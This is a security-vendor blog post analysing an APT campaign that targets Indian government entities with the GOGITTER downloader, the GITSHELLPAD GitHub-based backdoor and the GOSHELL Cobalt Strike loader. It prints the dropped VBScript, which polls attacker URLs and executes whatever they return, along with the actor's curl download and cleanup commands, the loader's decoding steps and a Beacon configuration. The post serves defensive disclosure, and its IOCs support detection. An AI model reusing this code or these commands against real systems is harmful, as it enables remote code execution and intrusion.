IntroductionIn September 2025, Zscaler ThreatLabz identified two campaigns, tracked asΒ Gopher StrikeΒ andΒ Sheet Attack, by a threat actor that operates in Pakistan and primarily targets entities in the Indian government.Β In both campaigns, ThreatLabz identified previously undocumented tools, techniques, and procedures (TTPs). While these campaigns share some similarities with the Pakistan-linked Advanced Persistent Threat (APT) group, APT36, we assess with medium confidence that the activity identified during this analysis might originate from a new subgroup or another Pakistan-linked group operating in parallel.This blog post is the first in a two-part series that covers theΒ Gopher StrikeΒ campaign, including the newly discovered GOGITTER tool as an initial downloader, a backdoor called GITSHELLPAD for command-and-control (C2) communication, and GOSHELL, a Golang shellcode loader used to deploy a Cobalt Strike Beacon. The second part of the blog will explore theΒ Sheet Attack campaign, including the attack chain, backdoors, and the use of generative AI in malware development.Key TakeawaysIn September 2025, ThreatLabz identified two new campaigns by a Pakistan-linked APT group targeting the Indian government. Based on their TTPs, we named the two campaignsΒ Gopher Strike andΒ Sheet Attack.The Gopher Strike campaign uses PDFs containing malicious links and fake prompts to trick victims into downloading an ISO file with a payload, ensuring delivery is restricted to targeted victims (Windows systems in India).GOGITTER is a new downloader written in Golang that fetches payloads from a threat actor-controlled private GitHub repository.GITSHELLPAD is a new lightweight backdoor written in Golang that leverages private GitHub repositories for C2 communication.GOSHELL is a shellcode loader written in Golang that deploys Cobalt Strike on specific hostnames that have been hardcoded into the malware. ThreatLabz assesses with medium confidence that these campaigns likely originate from a new subgroup or a parallel Pakistan-linked group, despite sharing similarities with the APT36 threat group.Technical AnalysisIn the following sections, ThreatLabz discusses the technical details of the Gopher Strike campaign, including how the GOGITTER downloader functions, the role of the GITSHELLPAD backdoor for C2 communication, and the deployment of a Cobalt Strike Beacon using GOSHELL.Gopher Strike campaign attack flowThe figure below shows the attack flow that leads to the deployment of Cobalt Strike.Figure 1: Shows how the Gopher Strike campaign leads to the deployment of Cobalt Strike.Initial infection vectorThreatLabz traced the origins of the Gopher Striker campaign to multiple PDFs presumably sent in spear phishing emails. These PDFs contain a malicious link and a blurred image of legitimate documents that would be of interest to the victim. The image is designed to trick victims into downloading a fake Adobe Acrobat update to access the document's contents. The dialog is presented as a button labeledΒ Download and Install, as shown in the figure below.Figure 2: Example of a PDF file used in the Gopher Strike campaign.If the victim clicks the button, an ISO file containing the malicious payload is downloaded. During analysis, ThreatLabz observed that the servers hosting the payload only respond with the ISO file when accessed from IP addresses in India, with aΒ User-Agent header representing a Windows platform. These server-side checks prevent automated URL analysis tools from fetching the ISO file, ensuring that the malicious file is only delivered to intended targets.GOGITTER downloaderGOGITTER is a previously undocumented lightweight 64-bit Golang-based downloader. The following sections outline the key functionalities of the downloader.GOGITTER sequentially checks for the existence of the VBScript fileΒ windows_api.vbs in the following locations:C:\Users\Public\DownloadsC:\Users\Public\Pictures%APPDATA%If the VBScript is not found in any of the locations above, GOGITTER attempts to create a new file namedΒ windows_api.vbs in the first accessible location. The contents of this VBScript are stored in plaintext within the binary.The contents of the VBScript fileΒ windows_api.vbs are included below.Dim objHTTP, lastresponse, name, primaryURL, fallbackURL
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
name = CreateObject("WScript.Network").ComputerName
primaryURL = "hxxps[:]//govt-filesharing[.]site/hpc5985.php?key=xvnd54&info=Hello" & name
fallbackURL = "hxxp[:]//ingov.myartsonline[.]com/hpc5985.php?key=xvnd54&info=Hello" & name
lastresponse = ""
Function GetResponse(url)
On Error Resume Next
objHTTP.Open "GET", url, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
objHTTP.setRequestHeader "Accept-Charset", "UTF-8"
objHTTP.setRequestHeader "Accept-Language", "en-US,en;q=0.5"
objHTTP.Send
If objHTTP.Status = 200 Then
GetResponse = objHTTP.responseText
Else
GetResponse = ""
End If
On Error GoTo 0
End Function
Do
responsebody = GetResponse(primaryURL)
If responsebody = "" Then responsebody = GetResponse(fallbackURL)
If responsebody "" And responsebody lastresponse Then
If Left(responsebody, 3) = "hi " Then
Execute Mid(responsebody, 4)
lastresponse = responsebody
End If
End If
WScript.Sleep 30000
LoopThis newly-created VBScript contains two pre-configured C2 URLs that are used to fetch VBScript commands every 30 seconds. The VBScript connects to the primary URL with a hardcoded User-Agent:Β Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 and two more pre-configured HTTP headers.If the response from the C2 server begins with the stringΒ hi, the remaining response strings are treated as VBScript commands and executed.If the response from the primary URL is empty, the script retrieves the secondary URL.To achieve persistence, a scheduled task is created with a dynamic name (MicrosoftEdge_ConfigurationUpdate_<__random__>) where a random four digit number is generated at runtime. This task is configured to execute the dropped windows_api.vbs script every 50 minutes.GOGITTER checks for the presence of the ZIP archiveΒ adobe_update.zip in the aforementioned locations in the same manner. If the file is not present, GOGITTER downloads a file namedΒ adobe_update.zip from the private threat actor-controlled GitHub repository atΒ hxxps[:]//raw.githubusercontent[.]com/jaishankai/sockv6/main/adobe_update.zip. A GitHub authentication token embedded in the binary is used to authenticate and download the archive from the private repository. The contents ofΒ adobe_update.zip are extracted to one of the three installation folder locations, dropping the executableΒ edgehost.exe and a zero byte text document.GOGITTER then sends an HTTP GET request to the URLΒ adobe-acrobat[.]in/ninevmc987.php?file=bncoeeav34564cvv94adfavc3354334dfsf, most likely to signal that the endpoint has been successfully infected.GITSHELLPAD backdoorTheΒ edgehost.exe file is GITSHELLPAD, a 64-bit lightweight Golang-based backdoor that leverages threat actor-controlled private GitHub repositories for its C2 communication. The backdoor registers the victim with the C2 server, and polls the C2 for commands to execute. GITSHELLPAD uses GitHubβs REST API to create a new directory in the threat actor-controlled GitHub repository with the format:Β SYSTEM-. GITSHELLPAD then adds the fileΒ info.txt into this new directory and commits the changes to theΒ main branch. TheΒ info.txt file contains the Base64-encoded string:Β PC Name: SYSTEM-.Β GITSHELLPAD polls the threat actor-controlled GitHub account for new commands every 15 seconds by sending a GET request to the GitHub REST Contents API endpoint for the fileΒ command.txt. If GITSHELLPAD is unable to connect to GitHub to fetchΒ command.txt, it retries every 8 seconds. If the contents ofΒ command.txt are empty, then GITSHELLPAD retries to fetch the content after 7 seconds.Once theΒ command.txt file is successfully fetched, its contents are Base64-decoded to retrieve the command string. The table below shows the commands supported by GITSHELLPAD.CommandDescriptioncd ..Change working directory to parent directory.cd Change directory to the specified path.run Run command in the background but don't capture the output.upload Upload the local file specified by the path to the GitHub repo.download Download a file to the specified path.Default caseExecute the command usingΒ cmd /c and capture the output.Table 1: Commands supported by GITSHELLPAD.All the logging messages detailing the command status and output are captured in theΒ result.txt file and uploaded to the threat actor's GitHub account via a PUT request. TheΒ command.txt file is deleted from the threat actor-controlled GitHub repository after successful command execution on the endpoint.During the investigation, ThreatLabz discovered four threat actor-controlled private GitHub repositories and observed more than 200 post-compromise commands issued by the threat actor. The table below lists a subset of the post-compromise commands observed by ThreatLabz.CategoryDescriptionSample CommandsUser reconnaissanceCollects information about the user.net userwhoamiSystem and network reconnaissanceCollects information about the system and network configuration.systeminfoarp -acurl ifconfig.me/ipwmic logicaldisk get nameNetwork connectivity checkChecks connectivity to the C2 server.curl -I https://adobe-acrobat[.]inDownload post-compromise toolsDownloads an archive to the victimβs filesystem.curl -L -o a.rar hxxps[:]//adobe-acrobat[.]in/a.rarClear filesystem tracesDeletes filesystem artifacts.del /f /q svchost.rarClear running process tracesKills GITSHELLPAD related processes.tasklist | findstr CLEANUPtaskkill /F /PID 10572Archive extractionExtracts the contents of a downloaded archive.tar -xvf svchost.rarTable 2: A list of commands issued by the threat actor during the attack campaign. These commands are executed using the GITSHELLPAD payload.A complete list of post-compromise commands are available in the ThreatLabzΒ GitHub repository.GOSHELL loaderAfter the threat actor gained access to the victimβs machine, ThreatLabz observed them downloading RAR archives containing post-compromise tools. The threat actors used the cURL commands shown in the table above to perform these downloads. The archives included tools that collect information from the compromised system. The threat actor also utilized GOSHELL, a custom-built Golang-based loader, to deploy a Cobalt Strike Beacon. Once the RAR archives were downloaded, they were extracted using theΒ tar utility, and the tools were deleted after use. In this analysis, we focus only on the primary backdoor that was deployed.GOSHELLβs size was artificially inflated to approximately 1 gigabyte by adding junk bytes to the Portable Executable (PE) overlay, likely to evade detection by antivirus software. These junk bytes were not entirely random but consisted of repeated byte sequences, such as:Null bytesSECURITY123456COMPRESSME!{AB CD EF 90 90 41 42 43 44 45 CC DE AD BE EF 00 FF 11 22 33}GOSHELL undergoes multiple decoding stages before eventually loading Cobalt Strike Beacon.GOSHELL only executes on specific hostnames by comparing the victim's hostname against a hardcoded list.Β If no match is found, GOSHELL exits.If a match is found, GOSHELL proceeds to decode the embedded second-stage shellcode. GOSHELL will:HEX-decode an embedded string and XOR the resulting bytes withΒ 0xAA.Sleep for a random interval between three and seven seconds.Execute the second-stage shellcode within the same process usingΒ QueueUserAPC.This 32-bit second-stage shellcode is executed by theΒ QueueUserAPC call. It performs another layer of decoding. The main purpose of the second-stage shellcode is to decrypt and load the next-stage Cobalt Strike payload. Below are its key functionalities.Allocates executable memory.Parses the PE header to extract the 4-byte XOR keyΒ 0x51211104.Copies the next-stage encrypted shellcode to executable memory.Decrypts the encrypted shellcode using the 4-byte XOR key.Invokes the entry point of the next-stage shellcode.Stage 3 is the final decoded payload, a stageless Cobalt Strike Beacon. ThreatLabz extracted the configuration, which appears to have beenΒ modified from a public profile.The Cobalt Strike configuration is shown below.BeaconType - HTTPS
Port - 443
SleepTime - 45000
MaxGetSize - 2801745
Jitter - 30
MaxDNS - Not Found
PublicKey_MD5 - 2e4e4ea817ad2286616f809ca84fc932
C2Server - d18c3nlvb0n2a6.cloudfront.net,/jquery-3.3.1.min.js
UserAgent - Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
HttpPostUri - /jquery-3.3.2.min.js
Malleable_C2_Instructions - Remove 1522 bytes from the end
Remove 84 bytes from the beginning
Remove 3931 bytes from the beginning
Base64 URL-safe decode
XOR mask w/ random key
HttpGet_Metadata - ConstHeaders
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://code.jquery.com/
Accept-Encoding: gzip, deflate
Metadata
base64url
prepend "__cfduid="
header "Cookie"
HttpPost_Metadata - ConstHeaders
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://code.jquery.com/
Accept-Encoding: gzip, deflate
SessionId
mask
base64url
parameter "__cfduid"
Output
mask
base64url
print
PipeName - Not Found
DNS_Idle - Not Found
DNS_Sleep - Not Found
SSH_Host - Not Found
SSH_Port - Not Found
SSH_Username - Not Found
SSH_Password_Plaintext - Not Found
SSH_Password_Pubkey - Not Found
SSH_Banner -
HttpGet_Verb - GET
HttpPost_Verb - POST
HttpPostChunk - 0
Spawnto_x86 - %windir%\syswow64\dllhost.exe
Spawnto_x64 - %windir%\sysnative\dllhost.exe
CryptoScheme - 0
Proxy_Config - Not Found
Proxy_User - Not Found
Proxy_Password - Not Found
Proxy_Behavior - Use IE settings
Watermark_Hash - NtZOV6JzDr9QkEnX6bobPg==
Watermark - 987654321
bStageCleanup - True
bCFGCaution - False
KillDate - 0
bProcInject_StartRWX - False
bProcInject_UseRWX - False
bProcInject_MinAllocSize - 17500
ProcInject_PrependAppend_x86 - b'\x90\x90'
Empty
ProcInject_PrependAppend_x64 - b'\x90\x90'
Empty
ProcInject_Execute - ntdll:RtlUserThreadStart
CreateThread
NtQueueApcThread-s
CreateRemoteThread
RtlCreateUserThread
ProcInject_AllocationMethod - NtMapViewOfSection
bUsesCookies - True
HostHeader -
headersToRemove - Not Found
DNS_Beaconing - Not Found
DNS_get_TypeA - Not Found
DNS_get_TypeAAAA - Not Found
DNS_get_TypeTXT - Not Found
DNS_put_metadata - Not Found
DNS_put_output - Not Found
DNS_resolver - Not Found
DNS_strategy - round-robin
DNS_strategy_rotate_seconds - -1
DNS_strategy_fail_x - -1
DNS_strategy_fail_seconds - -1
Retry_Max_Attempts - 0
Retry_Increase_Attempts - 0
Retry_Duration - 0
To Be ContinuedPart 1 explored theΒ Gopher Strike campaign, which targeted Indian government entities using private GitHub repositories for C2. It introduced the Golang-based downloader GOGITTER, the backdoor GITSHELLPAD, and GOSHELL, a shellcode loader used to execute a Cobalt Strike Beacon.InΒ Part 2, ThreatLabz will explore theΒ Sheet Attack campaign, which leveraged legitimate services like Google Sheets, Firebase, and email for C2. Weβll analyze the attack chain, backdoors, and the use of generative AI in malware development.Zscaler CoverageZscalerβs multilayered cloud security platform detects indicators related to GOGITTER at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for GOGITTER.Figure 3: Zscaler Cloud Sandbox report for GOGITTER.In addition to sandbox detections, Zscalerβs multilayered cloud security platform detects indicators related to the targeted attacks mentioned in this blog at various levels with the following threat names:Win64.Backdoor.GITSHELLPADWin64.Downloader.GOGITTERWin64.Backdoor.GOSHELLIndicators Of Compromise (IOCs)File indicatorsHashesFilenameDescriptionb531b8d72561cb5c88d97986e450bbaeccd0228e9c1bdb4c355d67c98a3233bb1fa085ac3f2a52ec2dd2d6614115687325f1da9e028937f8a16bccc347de8c71c3aa87e1Operational_Information_Advisory_June2025.pdfΒ Phishing PDF8577f613b3aec5c1c90118b15eea8756667785fdde357ae65a6668545c6c013190dc936899c3e908277df232d7170e1ea0697f79047c7f5610524bd11dc571fe4d84696bCircular_on_Updated_Allowances_TA_DA_PCCA_MHA.pdfPhishing PDFc876a70380738236ee28aab60a2cde6e0041636465cad79518a06d528e76393f442bf49523327fe1158c2e1229dfac028c461eb331686e5c5c04f33af7a042676806a962PCCA_Allowances_Revision_Circular.pdfΒ Phishing PDF9b9c574cdb17c238df80414476228a784c33100babea20749ff0957f50b174046bc6489d03edba9908a2f9e1012237d216e894029bd58f9121027e35f80d7b701d30ca95TA_DA_Revised_Procedures_MEA.pdfΒ Phishing PDFf2a71b2719744765ac8a6a49b2acbce6699329d64308a172c6cf7f83712215490fc0b6047434a71a8302462d56fee876c74cf3595cba9f2ca6940b3a11ece8aa064fcbaaInvite Capt (IN) Sandip Kapoor Presedent AFWHO.pdfPhishing PDF0d86b8039cffc384856e17912f3086166a11c0e5f1d1e22e89b4921c7a371dbf9cf547098f495603be80b513820a948d51723b616fac33f0f382fa4a141e39e12fff40cfedgehost.exeGITSHELLPADf454e2724a63cbbfda26daff1d8bb6106036098059fa1311866ce6ad2723c4d0d1f001386c60e5b28e352375d101eb0954fa98d229de3b94f22d5815af8948ebed1f44ddedgehost.exeGITSHELLPAD10a7725f807056cb0383a1cae38d49b454bfe1ffba8bff3571093ade5038dc98ef5f46ceaf01c12019a3a3aa64e8a99d7231e0f2af6084298733bba3d7d41db13091cbacedgehost.exeGITSHELLPADe26b3fece2fe296654406ef8045ffda16d1dbd92f7ed7381c7bfca681c3139daeab692f15d9b2e61ed45b6407b778a18ff87792265fa068d7c4580ae54fbf88af435679fedgehost.exeGITSHELLPADf4813d65cd7246f716fcbd8f7fd3e63d3d48ab9567c6080471459b34dfc12c89418be8a295a2fb8b6c7b74a7f598819810ddb0a505f3d5cf392b857ff8e75c5a1401110eedgehost.exeGITSHELLPADf2284f62625f117c57384b1c5b8b8f583c17dbf975af8eb7a67e6908f522c93c2c0662e5fff79ce90b1af67e0b6d16a850e85861c948f988eda39ef46457241bbe3df170edgehost.exeGITSHELLPADNetwork indicatorsTypeIndicatorC2 URLhxxps://adobe-acrobat[.]in/ninevmc987.php?file=bncoeeav34564cvv94adfavc3354334dfsfC2 URLhxxp://workspace1.myartsonline[.]com/hpc5985.php?key=xvnd54&info=HelloC2 URLhttp://ingov.myartsonline[.]com/hpc5985.php?key=xvnd54&info=HelloC2 URLhttps://govt-filesharing[.]site/hpc5985.php?key=xvnd54&info=HelloDownload URL, GOGITTER payloadhttps://d2i8rh3pkr4ltc.cloudfront[.]net/adobe_installation.php?file=Adobe_Acrobat_Reader_Installation_SetupDownload URL, GOGITTER payloadhttps://adobereader-upgrade[.]in/adobe_update.php?file=Adobe_Acrobat_Reader_InstallationDownload URL, GOGITTER payloadhttps://adobecloud[.]site/adobe_installer.php?file=Adobe_Acrobat_InstallerDownload URL, GOGITTER payloadhttps://adobe-acrobat[.]in/adobe_reader_setup.php?file=Adobe_Acrobat_Reader_Installation_SetupPayload hosting domainadobereader-update[.]inC2 domainlistsoft-update[.]siteC2 domainworkspace1.myartsonline[.]comC2 domainingov.myartsonline[.]comC2 domaingovt-filesharing[.]sitePayload hosting domainadobereader-upgrade[.]inPayload hosting domainadobecloud[.]sitePayload hosting domainadobe-acrobat[.]inΒ MITRE ATT&CK FrameworkIDTactic, TechniqueDescriptionT1583.001Resource Development, Acquire Infrastructure: Domainsgovt-filesharing[.]site andΒ ingov.myartsonline[.]com were acquired for C2 communication.T1583.006Resource Development, Acquire Infrastructure: Web ServicesThe threat actor used private GitHub repositories as a C2 channel and to host the second-stage payloadΒ adobe_update.zip.T1585.003Resource Development, Establish Accounts: Cloud AccountsThe threat actor created GitHub accounts to host private repositories for C2 communication and payload staging.T1587.001Resource Development, Develop Capabilities: MalwareThe threat actor developed custom malware such as the GOGITTER downloader and GITSHELLPAD.T1588.002Resource Development, Obtain Capabilities: ToolThe threat actor obtained and used a leaked version of Cobalt Strike.T1608.001Resource Development, Stage Capabilities: Upload MalwareThe threat actor staged malware by uploading theΒ adobe_update.zip archive to a private GitHub repository.T1566.002Initial Access, Phishing: Spearphishing LinkThe threat actor used phishing PDFs which contained a lure with a βDownload and Installβ button, linking to a malicious ISO file.T1059.003Execution, Command and Scripting Interpreter: Windows Command ShellGITSHELLPAD executed commands such asΒ net user,Β systeminfo, andΒ taskkill using a command shell.T1059.005Execution, Command and Scripting Interpreter: Visual BasicThe GOGITTER downloader dropped a VBScript file,Β windows_api.vbs, and created a scheduled task to execute it. This script then fetched and ran additional VBScript commands from a C2 server using theΒ Execute function.T1106Execution, Native APIThe GOSHELL shellcode loader used theΒ QueueUserAPC native API call to execute the second-stage shellcode within its own process.T1053.005Persistence, Scheduled Task/Job: Scheduled TaskThe GOGITTER downloader created a scheduled task to execute a dropped VBScript every 50 minutes for persistence.Β T1140Defense Evasion, Deobfuscate/Decode Files or InformationThe Cobalt Strike Beacon loader decodes the second-stage shellcode and the Beacon payload using HEX-decoding and XOR operations.T1036.004Defense Evasion, Masquerading: Masquerade Task or ServiceThe GOGITTER downloader creates a scheduled task,Β MicrosoftEdge_ConfigurationUpdate_<__random__>, to mimic a legitimate Microsoft Edge update task for persistence.T1036.005Defense Evasion, Masquerading: Match Legitimate Resource Name or LocationThe malware drops files with names intended to appear legitimate, such asΒ windows_api.vbs,Β adobe_update.zip, andΒ edgehost.exe.T1055.004Defense Evasion, Process Injection: Asynchronous Procedure CallThe GOSHELL shellcode loader executed a second-stage shellcode within its own process using theΒ QueueUserAPC API call.T1070.004Defense Evasion, Indicator Removal: File DeletionThe threat actor executed the commandΒ del /f /q svchost.rar to delete downloaded archive files.T1480.001Execution Guardrails: Environmental KeyingThe GOSHELL shellcode loader was designed to execute only on specific hostnames by comparing the victim's hostname against a hardcoded list.T1027.001Defense Evasion, Obfuscated Files or Information: Binary PaddingThe threat actor used the GOSHELL shellcode loader that was inflated to approximately 1 gigabyte in size by adding junk bytes.T1027.009Defense Evasion, Obfuscated Files or Information: Embedded PayloadsThe GOGITTER downloader binary contained embedded payloads such as theΒ windows_api.vbs. The GOSHELL shellcode loader contained an embedded second-stage shellcode as well as Cobalt Strike Beacon.T1027.013Defense Evasion, Obfuscated Files or Information: Encrypted/Encoded FileThe Cobalt Strike payload was obfuscated using a 4-byte XOR key (0x51211104).Β Β T1027.015Defense Evasion, Obfuscated Files or Information: CompressionThe second-stage payload was delivered as a ZIP archive named from a private GitHub repository. Post-compromise tools were also downloaded in RAR archives.T1553.005Defense Evasion, Subvert Trust Controls: Mark-of-the-Web BypassThe malicious payload was distributed as an ISO file, a known method of bypassingΒ Mark-of-the-Web Bypass (MOTW) controls.T1033Discovery, System Owner/User DiscoveryThe threat actor executed theΒ whoami command as part of post-compromise user reconnaissance activities.T1082Discovery, System Information DiscoveryThe threat actor executed post-compromise commands such asΒ systeminfo and wmic logicaldisk get name to gather detailed information about the system.T1016Discovery, System Network Configuration DiscoveryThe threat actor executed the commandΒ arp -a and curl ifconfig.me/ip to discover the victimβs network configurations.T1016.001Discovery, System Network Configuration Discovery: Internet Connection DiscoveryThe threat actor executed the commandΒ curl -I https://adobe-acrobat.in to check for an internet connection to their C2 server.T1087.001Discovery, Account Discovery: Local AccountThe threat actor executed theΒ net userΒ command to enumerate local accounts.T1057Discovery, Process DiscoveryThe threat actor executed the commandΒ tasklist to gather information on active processes.T1018Discovery, Remote System DiscoveryThe threat actor executed theΒ arp -a command to discover other systems on the local network.T1560.003Collection, Archive Collected Data: Archive via Custom MethodThe Cobalt Strike Beacon used was configured to encrypt its C2 output using a XOR mask.T1071.001Command and Control, Application Layer Protocol: Web ProtocolsThe malicious VBScript fetched commands via HTTP, and the Cobalt Strike Beacon used HTTPS for C2.T1102.002Command and Control, Web Service: Bidirectional CommunicationGITSHELLPAD uses a private GitHub repository as a bidirectional C2 channel.T1573.001Command and Control, Encrypted Channel: Symmetric CryptographyThe Cobalt Strike Beacon was configured to use XOR to encrypt its C2 communications.T1573.002Command and Control, Encrypted Channel: Asymmetric CryptographyThe Cobalt Strike Beacon used HTTPS for its C2 channel.T1132.001Command and Control, Data Encoding: Standard EncodingGITSHELLPAD Base64-encoded the victim's system information before writing it to theΒ info.txt file in the private GitHub C2 repository. The Cobalt Strike Beacon was configured to use Base64 for its C2 communication.T1105Command and Control, Ingress Tool TransferAfter the initial compromise, the threat actor used curl to download post-compromise tools onto the victim's machine.T1665Command and Control, Hide InfrastructureThe server hosting the malicious payloads only responds to requests originating from IP addresses in India who have aΒ User-Agent header indicating a Windows platform.T1008Command and Control, Fallback ChannelsTheΒ windows_api.vbs script was configured with both a primary and a backup C2 URL.Β T1567.001Exfiltration, Exfiltration Over Web Service: Exfiltration to Code RepositoryGITSHELLPAD exfiltrated files to a private, threat actor-controlled GitHub repository.
The post APT Attacks Target Indian Government Using GOGITTER, GITSHELLPAD, and GOSHELL | Part 1 appeared first on Security Boulevard.
Login
